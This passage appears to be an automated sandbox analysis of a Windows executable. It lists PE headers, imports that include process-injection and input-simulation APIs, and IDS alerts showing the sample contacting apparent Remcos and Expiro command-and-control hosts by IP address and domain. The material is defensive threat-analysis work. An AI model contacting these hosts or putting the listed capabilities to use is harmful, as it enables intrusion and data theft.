                                                                                                                                                                                                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                                                                                                                                                                              call 00007F1CF869D53Bh
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp 00007F1CF86943AEh
                                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                                                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                                                                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                                                                                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                                                                                                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                                                                                                                                                                                                                                                                              add eax, esi
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                                                                                                                                                                                                                                              jbe 00007F1CF869452Ah
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, eax
                                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007F1CF86946C6h
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 00000080h
                                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007F1CF869453Eh
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                                                                                                                                                                                                                                                                              je 00007F1CF8694535h
                                                                                                                                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                                                                                                                                              and edi, 0Fh
                                                                                                                                                                                                                                                                                                                                                                                                                              and esi, 0Fh
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                                                                                                                                                                                                              jne 00007F1CF8694527h
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp 00007F1CF8694902h
                                                                                                                                                                                                                                                                                                                                                                                                                              test edi, 00000003h
                                                                                                                                                                                                                                                                                                                                                                                                                              jne 00007F1CF8694536h
                                                                                                                                                                                                                                                                                                                                                                                                                              shr ecx, 02h
                                                                                                                                                                                                                                                                                                                                                                                                                              and edx, 03h
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007F1CF869454Bh
                                                                                                                                                                                                                                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                                                                                                                                                                                              mov edx, 00000003h
                                                                                                                                                                                                                                                                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007F1CF869452Eh
                                                                                                                                                                                                                                                                                                                                                                                                                              and eax, 03h
                                                                                                                                                                                                                                                                                                                                                                                                                              add ecx, eax
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                                              inc cx
                                                                                                                                                                                                                                                                                                                                                                                                                              add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                                                                                                                                                                                                                                                                              inc cx
                                                                                                                                                                                                                                                                                                                                                                                                                              add byte ptr [ebx], ah
                                                                                                                                                                                                                                                                                                                                                                                                                              ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                                                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                                                                                                                                                                                                              add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                                                                                                                                                                                                                                                                              add al, cl
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp 00007F1CFAB0CD27h
                                                                                                                                                                                                                                                                                                                                                                                                                              add esi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                                              add edi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007F1CF86944EEh
                                                                                                                                                                                                                                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00000000h+edx*4]

                                                                                                                                                                                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                                                                                                              • [C++] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                                                                                                              • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                                                                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                                                                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                                                                                                                                                                                                                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                                                                                                                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                                                                                                                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                                                                                                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                                                                                                                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                                                                                                                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                                                                                                                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                                                                                                                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                                                                                                                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                                                                                                                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                                                                                                                                                                                                                                                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                                                                                                                                                                                                                                                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                                                                                                                                                                                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                                                                                                                                                                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                                                                                                                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                                                                                                                                                                                                                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                                                                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                                                                                              EnglishGreat Britain
                                                                                                                                                                                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:27:56.766976+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449730204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:00.098295+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449733204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:00.917887+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449735TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:00.917887+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449735TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:01.462034+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4635801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:01.591126+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449736TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:01.591126+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449736TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:02.007408+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.449739172.234.222.14380TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:02.566420+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4492491.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:02.796510+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449738204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:04.583945+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449745TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:04.583945+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449745TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:04.661509+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4508531.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:05.317236+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:06.066011+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4575331.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:07.914367+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449752204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:10.388161+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449758204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:12.896990+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449761204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:15.373843+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449762204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:17.879881+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449764204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:20.556968+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449765204.10.160.2126622TCP
